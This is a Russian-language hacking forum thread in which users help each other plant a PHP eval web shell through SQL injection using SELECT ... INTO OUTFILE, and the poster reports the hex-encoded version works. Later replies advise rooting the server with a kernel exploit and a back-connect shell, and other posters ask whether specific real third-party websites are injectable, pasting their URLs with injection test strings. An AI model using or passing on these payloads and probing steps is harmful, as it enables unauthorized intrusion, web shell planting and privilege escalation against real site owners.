вот создал запрос select '<? eval($_GET[cmd]);?>' into outfile блабла
файл создался, пишет ошибку
Parse error: syntax error, unexpected ')' in /usr/home/yana2/www/site10/public_html/lnd2.php on line 1

я чето не вижу в синтаксисе ошибку((

ты прямо подставляй запрос cmd=phpinfo();

Я ведь делаю запрос со своего сервера, с файла
$query ="select '<? echo eval($_GET['cmd']);?>' into outfile '/usr/home/yana2/www/site10/public_html/lnd10.php'";
$res = mysql_query($query);

ошибка syntax error

Если пишу eval($_GET[cmd]); <- без кавычек
то оштбка:yntax error, unexpected ')'

Помогите, может както кодировку понятную мускул зделать?

Хекси.

О )) спс)) все работает)
И еще один может глупый вопрос, можно ли както повысить права на папку имея только шелл?

привет команде;

Можно ли придать этим сайтом? потому что я пытался, но никакого результата

http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%27

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''36''' at line 1

http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%20order%20by%201000-- <-true

Да, рутай сервер.
Ищи сплоит под версию ядра (uname -a), делай бэкконект и пробуй запустить плоент.
Если год версии ядра 2010, то врят ли порутаешь.

Редко, если только пользователь, от которого запускается web-сервер, является владельцем или входит в группу владельцев папки, к которой необходимо поменять доступ.

Здесь есть SQL-inj?

http://www.bigr.nl/website/structure/main.php?page=people&subpage=person&id=51'+order+b y+1000+--+